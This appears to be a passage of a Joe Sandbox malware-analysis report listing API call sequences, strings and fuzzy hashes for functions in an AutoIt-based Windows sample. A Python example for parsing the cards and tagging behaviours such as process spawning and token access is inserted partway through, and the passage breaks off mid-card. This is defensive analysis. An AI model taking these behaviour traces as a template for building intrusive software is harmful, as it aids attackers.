                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14BF
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14F2
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 88d53ad815598692c91cb97f0659a74ad4b9733f639647ae6502f2b654f6510e
                                                • Instruction ID: 05cdba0ee3bafca5c8e50ac9cbe4c1630ad10e473d65063f5e4864fcba31b37d
                                                • Opcode Fuzzy Hash: 88d53ad815598692c91cb97f0659a74ad4b9733f639647ae6502f2b654f6510e
                                                • Instruction Fuzzy Hash: FD113C32D0056DEBCF009FE5D948AEEBB78FF09711F418156E940B6340CB389550DB95
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007CDB5C
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007CDB73
                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007CDB88
                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007CDBA6
                                                Similarity
                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                • Opcode ID: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
                                                • Instruction ID: ac76bb15c3a691b97a121bb0f5af4da686ed80130f24e8ebed37726d73a8fe37
                                                • Opcode Fuzzy Hash: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
                                                • Instruction Fuzzy Hash: 701179B1201704EBE3308F10DC48FA3BBB8EF00B10F10856DAA56C6040DBB8ED14EBA5
                                                APIs
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: d2352d67c116494129cf4013bd6054a981c54a7dda866982e81be20bd7ad6944
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: B0018C3214814EFBCF1A5E84CC058EE3FA6BF9A345B088615FE1858130C33AC9B1EB81
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007FB318
                                                • ScreenToClient.USER32(?,?), ref: 007FB330
                                                • ScreenToClient.USER32(?,?), ref: 007FB354
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB36F
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
                                                • Instruction ID: a6a12df3c0908fe795f6ab4d48976e8291b878a856b51ffe9869802095220ecd
                                                • Opcode Fuzzy Hash: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
                                                • Instruction Fuzzy Hash: F6113475D00209EFDB41CF98C4849EEBBB5FF08210F108166E914E2220DB35AA55CF54
                                                APIs
                                                • _memset.LIBCMT ref: 007FB678
                                                • _memset.LIBCMT ref: 007FB687
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00836F20,00836F64), ref: 007FB6B6
                                                • CloseHandle.KERNEL32 ref: 007FB6C8
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
                                                • Instruction ID: e1dab048817948c26c05f20a41826e089bf9653f2b01576cc178079c32df7d50
                                                • Opcode Fuzzy Hash: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
                                                • Instruction Fuzzy Hash: CDF0D0B6540708BBE6102769BC05F777A5DFF45754F008425BB08D5196EB795C2087A8
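The cards in this listing give, per function, the API call sequence with the argument values the sandbox observed, and two fuzzy hashes. As an added example (not part of the Joe Sandbox report or its tooling), the Python below parses cards in this page's layout into structured records, decodes the dwCreationFlags argument of CreateProcessW (the 0x20 observed at ref 007FB6B6 is NORMAL_PRIORITY_CLASS), tags a few API combinations that appear in these cards, and extracts the fuzzy hashes as pivots for finding the same code in other samples. The sample input is constructed by copying three cards from this report; the RULES labels and the CREATION_FLAGS table are this example's own assumptions, not Joe Sandbox output.

```python
"""Parse Joe Sandbox IDA-plugin function cards ("APIs" / "Similarity" blocks) into records."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three cards copied from this report, trimmed to the lines the
# parser needs. The two-space indent on the "Part of subcall" line mirrors the page.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 007FB678
• _memset.LIBCMT ref: 007FB687
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00836F20,00836F64), ref: 007FB6B6
• CloseHandle.KERNEL32 ref: 007FB6C8
Memory Dump Source
• Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• Opcode Fuzzy Hash: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
• Instruction Fuzzy Hash: CDF0D0B6540708BBE6102769BC05F777A5DFF45754F008425BB08D5196EB795C2087A8
APIs
• GetCurrentThread.KERNEL32 ref: 007C8A43
• OpenThreadToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A4A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C860E), ref: 007C8A57
• OpenProcessToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A5E
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007D6C8F
  • Part of subcall function 007D776D: _memset.LIBCMT ref: 007D77A2
• _memmove.LIBCMT ref: 007D6CB2
• LeaveCriticalSection.KERNEL32(?), ref: 007D6CCF
"""

# "<name>.<module>[(args)], ref: <addr>", optionally reported from a callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")  # "• Key: value" attribute lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int for observed values, None where the page shows "?"
    ref: int                          # call-site virtual address
    via_subcall: Optional[int] = None  # callee address when listed as "Part of subcall"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    attrs: dict = field(default_factory=dict)  # Similarity / Memory Dump Source fields

def parse_args(text):
    """'00000000,?,00000020' -> [0, None, 0x20]; unresolved values are printed as '?'."""
    if not text:
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]

def parse_records(text):
    """Split the listing at each 'APIs' heading; collect calls and attributes per card."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is not None and line.startswith("•"):
            if m := API_RE.match(line):
                cur.apis.append(ApiCall(m["name"], m["module"], parse_args(m["args"]),
                                        int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            elif m := KV_RE.match(line):
                cur.attrs[m["key"].strip()] = m["val"].strip()
    return records

# Hunting rules over each card's API set. API names come from this report's cards;
# the labels are this example's own reading of them (assumption, not sandbox output).
RULES = {
    "spawns child process": {"CreateProcessW"},
    "opens own process/thread token": {"OpenProcessToken", "OpenThreadToken"},
    "attaches to another thread's input": {"AttachThreadInput", "GetWindowThreadProcessId"},
}
# dwCreationFlags bits for CreateProcessW (values from the Win32 headers).
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x08000000: "CREATE_NO_WINDOW"}

def classify(record):
    names = {c.name for c in record.apis}
    return sorted(label for label, need in RULES.items() if need <= names)

def create_process_flags(record):
    """Decode the 6th argument (dwCreationFlags) of each CreateProcessW call in the card."""
    out = []
    for c in record.apis:
        if c.name == "CreateProcessW" and len(c.args) > 5 and c.args[5] is not None:
            out.append((c.args[5], [n for bit, n in CREATION_FLAGS.items() if c.args[5] & bit]))
    return out

def hunting_pivots(record):
    """The two per-function fuzzy hashes: the values to search for in other samples."""
    return {k: record.attrs.get(f"{k} Fuzzy Hash") for k in ("Opcode", "Instruction")}

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print([c.name for c in rec.apis], classify(rec), create_process_flags(rec), hunting_pivots(rec))
```

Values shown as `?` are left as None rather than guessed, so a rule that depends on a specific argument (for example CREATE_SUSPENDED before a remote write) only fires when the sandbox actually resolved that value.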
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D6C8F
                                                  • Part of subcall function 007D776D: _memset.LIBCMT ref: 007D77A2
                                                • _memmove.LIBCMT ref: 007D6CB2
                                                • _memset.LIBCMT ref: 007D6CBF
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D6CCF
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: b5a1c718e0e478038b1ec0831ab5e635da3b14a99a1e0e301ea5f63cd30bfb60
                                                • Instruction ID: 3cce53e8dd9294ec7ee7ae8b09db8f2bf81b1481ca62a9421a8b32388fe4e043
                                                • Opcode Fuzzy Hash: b5a1c718e0e478038b1ec0831ab5e635da3b14a99a1e0e301ea5f63cd30bfb60
                                                • Instruction Fuzzy Hash: 23F0303A100104EBCF416F55EC89A49BB2AFF45320F04C065FE085E21ACB35A911CBB5
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CA179
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007CA18C
                                                • GetCurrentThreadId.KERNEL32 ref: 007CA193
                                                • AttachThreadInput.USER32(00000000), ref: 007CA19A
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 0b09c6c47615a47a775f5ba3edfb44436ac088c847173edd91ee098cd1c32272
                                                • Instruction ID: 5e1e29fca060eb963a0ac29f8e6c5a978e7a7e710707580521e723a8195efa46
                                                • Opcode Fuzzy Hash: 0b09c6c47615a47a775f5ba3edfb44436ac088c847173edd91ee098cd1c32272
                                                • Instruction Fuzzy Hash: 6BE0C93154522CBBDB205BA2DC0DFE77F6CEF267A2F448029F509D90A0CE798940CBA5
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00772231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0077223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00772250
                                                • GetStockObject.GDI32(00000005), ref: 00772258
                                                • GetWindowDC.USER32(?,00000000), ref: 007AC003
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC010
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 007AC029
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 007AC042
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC062
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC06D
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: aa4695de619e693a99d96e6e39ee4a6ebf007f4bbb80115283a08023a7a16bb6
                                                • Instruction ID: ef0494af85622dc10e4652a50a14fd4ed2d3674822ce7d84f7f7adb6bfb4d38f
                                                • Opcode Fuzzy Hash: aa4695de619e693a99d96e6e39ee4a6ebf007f4bbb80115283a08023a7a16bb6
                                                • Instruction Fuzzy Hash: 56E03932100248EAEF215F64EC0D7E83B10EF46332F04C366FA69880E28B7A4990DB15
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 007C8A43
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A4A
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C860E), ref: 007C8A57
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A5E
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
                                                • Instruction ID: fd28b0b4b87a99e2645a5183391135b3b38835a29710709dabf35dec574e4e5b
                                                • Opcode Fuzzy Hash: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
                                                • Instruction Fuzzy Hash: 02E04F36641211DFD7605FB06D0CF6A3BA8AF50792F04C83CE245C9040DE289441D755
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B20B6
                                                • GetDC.USER32(00000000), ref: 007B20C0
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B20E0
                                                • ReleaseDC.USER32(?), ref: 007B2101
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 5c28a0219924d927a9134707d6d8879dcfcaa144c9560e05b314070f72b44853
                                                • Instruction ID: 05f050caecf36de4e8c205ea4ef877e4cac8a3ab7224099d9f5d26d00d1f2711
                                                • Opcode Fuzzy Hash: 5c28a0219924d927a9134707d6d8879dcfcaa144c9560e05b314070f72b44853
                                                • Instruction Fuzzy Hash: 35E0C275801204EFCF01AF6088486AD7BB1AF4C350F11C029E95AE6221CF3C8141DF45
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B20CA
                                                • GetDC.USER32(00000000), ref: 007B20D4
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B20E0
                                                • ReleaseDC.USER32(?), ref: 007B2101
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: b44438fe350d788be41ef41eabc52fa696d460aab9084a39d960900bf2429d79
                                                • Instruction ID: efa18b5accc5356f4f4e74896b2d6a89d781c543c5b8ed1eb67d0e7371668f00
                                                • Opcode Fuzzy Hash: b44438fe350d788be41ef41eabc52fa696d460aab9084a39d960900bf2429d79
                                                • Instruction Fuzzy Hash: 5BE0CAB5800204AFCF01AFA088486AD7BA1AF4C350B11C029E95AE6220CF3C9141DF48
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 007CB780
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 3565006973-3941886329
                                                • Opcode ID: e18da8363c630034850b6565835b31e0ac6e6522c4dd4437a091d91b187d8a83
                                                • Instruction ID: e095e2c5425e8257cb052f80db9918a7978f55f1c8b13c273316f56e5bbfdbc7
                                                • Opcode Fuzzy Hash: e18da8363c630034850b6565835b31e0ac6e6522c4dd4437a091d91b187d8a83
                                                • Instruction Fuzzy Hash: 33913670600601AFDB54DF68C885F6ABBE9FF48710F14856EF94ADB691DBB4E840CB90
                                                APIs
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • __wcsnicmp.LIBCMT ref: 007DB0B9
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB182
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: e596573993f2a5dd1140cbbef34d5857779f9fe27c2196bb1f8ed5170488e146
                                                • Instruction ID: 77233a16f53d7857c820bad55d20079fe163cdadefad8c6caad820ff8cc2ebdb
                                                • Opcode Fuzzy Hash: e596573993f2a5dd1140cbbef34d5857779f9fe27c2196bb1f8ed5170488e146
                                                • Instruction Fuzzy Hash: E0615276A00219EFCB14DF94C895EAEB7B4EF48310F15805AF656AB351DB78AE40CB90
                                                APIs
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Oax
                                                • API String ID: 4104443479-2797580295
                                                • Opcode ID: 5610e92988c8d154027db86d3ea04e669162947e35be828fff2951c1ea1fec8e
                                                • Instruction ID: 019cf9f624e1f55c673c2b07b4acd43b2ba8f96b902c14ba0581eebf86106e25
                                                • Opcode Fuzzy Hash: 5610e92988c8d154027db86d3ea04e669162947e35be828fff2951c1ea1fec8e
                                                • Instruction Fuzzy Hash: 50514DB0A00609DFDF64DF68D880AEEBBF5FF44304F14852AE85AD7240EB35A955CB52
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00782AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00782AE1
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: 7d38e34a7f59d7f56a4cd3ec0828fd7674bcd4a5b55cbdb385da511a85a2c12d
                                                • Instruction ID: 7adb52bf6b0869030d7d93657c0a0a82aa2aaa0b3a5f4839347409432f575981
                                                • Opcode Fuzzy Hash: 7d38e34a7f59d7f56a4cd3ec0828fd7674bcd4a5b55cbdb385da511a85a2c12d
                                                • Instruction Fuzzy Hash: F8516672419744DBD720AF10D88ABAFBBF8FF85350F42885CF2D9511A1DB348529CB66
                                                APIs
                                                  • Part of subcall function 0077506B: __fread_nolock.LIBCMT ref: 00775089
                                                • _wcscmp.LIBCMT ref: 007D98CD
                                                • _wcscmp.LIBCMT ref: 007D98E0
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 1f9631f61c6f059d8e880fc00f6b07f04d075b987539a52914df12ec3cc38772
                                                • Instruction ID: 36ed86ed8b894d0355e28f03478376ebbfc43e017a28e3592f8ebc80f4835174
                                                • Opcode Fuzzy Hash: 1f9631f61c6f059d8e880fc00f6b07f04d075b987539a52914df12ec3cc38772
                                                • Instruction Fuzzy Hash: 2F41D971A00619FADF219FA0CC49FEF77BDDF45714F00446ABA04A7281DA79AD05C7A1
                                                APIs
                                                • _memset.LIBCMT ref: 007E26B4
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E26EA
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 6f853e4bc09f88d9b9d2cc29ff1b43b4d071971054318e4791799ec22a79c79f
                                                • Instruction ID: e1466e7ea8d372e05fa62f83428f45a2c2d09f400e01e907d5f5f23536661d53
                                                • Opcode Fuzzy Hash: 6f853e4bc09f88d9b9d2cc29ff1b43b4d071971054318e4791799ec22a79c79f
                                                • Instruction Fuzzy Hash: 26313971801109EFCF05EFA1CC89EEEBFB9FF08350F104069F909A6166EA355A56DB60
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F7B93
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F7BA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: ff54c65f0d79628802feea879caccfaabee328a7e5e1c78648ed616273d0ffbf
                                                • Instruction ID: d92c69e423ca99e6dd66e6117307b209f13013fdb4ac08f9ca24e172b922efba
                                                • Opcode Fuzzy Hash: ff54c65f0d79628802feea879caccfaabee328a7e5e1c78648ed616273d0ffbf
                                                • Instruction Fuzzy Hash: DA4107B4A05209DFDB14CF69C881BEABBB5FF09300F10456AEA04EB391D774A951CF90
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 007F6B49
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F6B85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 954aced3cbcf0ed0f4c53cbdfc2940a8389c68cd386f86aa85f3dbcb72e41d6d
                                                • Instruction ID: dcfc7dd7fb6a86a345e14d8d6c5673937c0205e749b7f2556419b0be630f5ddd
                                                • Opcode Fuzzy Hash: 954aced3cbcf0ed0f4c53cbdfc2940a8389c68cd386f86aa85f3dbcb72e41d6d
                                                • Instruction Fuzzy Hash: 4A316F71100608AADB109F64CC85AFB77A9FF88760F10C519FA99D7290DB39AC41D760
                                                APIs
                                                • _memset.LIBCMT ref: 007D2C09
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D2C44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 339f5467ef82eb19048d3631e7f2f2ef7398a6596a40947384cb9aa327597b7c
                                                • Instruction ID: 18a650627379ef9b95ac8f1d34c12256fbef1d195f464fd0138557f1b9be5408
                                                • Opcode Fuzzy Hash: 339f5467ef82eb19048d3631e7f2f2ef7398a6596a40947384cb9aa327597b7c
                                                • Instruction Fuzzy Hash: 4031E831610205DFDB349F44D8857AEBBB5FF15350F24401AE889972A2E7789E43CB60
                                                APIs
                                                • __snwprintf.LIBCMT ref: 007E3B7C
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 3506404897-2584243854
                                                • Opcode ID: 3d20e11bedbc8d9b2605e182f22ecd06f374f5ed547454857f690cc516366895
                                                • Instruction ID: e2085d7a8eed1a11990f226b7c3c542a12c3a373b61fbd6626b17ec3a4b382d6
                                                • Opcode Fuzzy Hash: 3d20e11bedbc8d9b2605e182f22ecd06f374f5ed547454857f690cc516366895
                                                • Instruction Fuzzy Hash: EE219570601118EBCF14EF64DC8AEAD77A4FF49700F508498F519A7281DB78EA55CBA1
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6793
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F679E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 698e42852813828292da6062e6312c079e088d4d5d21454a6dc461d0d16809d8
                                                • Instruction ID: 6fa3ee7baab75093a6ea7e30516984dc6f06afa5bbd941b411704c71de688acd
                                                • Opcode Fuzzy Hash: 698e42852813828292da6062e6312c079e088d4d5d21454a6dc461d0d16809d8
                                                • Instruction Fuzzy Hash: 0111827530020DAFEF21AF24DC85EBB376AEB983A8F104125FA1897390D6399C5197B0
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • GetWindowRect.USER32(00000000,?), ref: 007F6CA3
                                                • GetSysColor.USER32(00000012), ref: 007F6CBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 5b9ad48d22d536fcb7114c8c6ee70a2ca48183a654a18a2421235a94a450c9b3
                                                • Instruction ID: 16d39002422e9710219c875af945fb8e46076d1742d6ec47102605b5b4718655
                                                • Opcode Fuzzy Hash: 5b9ad48d22d536fcb7114c8c6ee70a2ca48183a654a18a2421235a94a450c9b3
                                                • Instruction Fuzzy Hash: 0221FC72510209AFDF14DFA8DC45AFA7BB8FB08314F044529FA95D3251EA39E851DB60
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 007F69D4
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F69E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
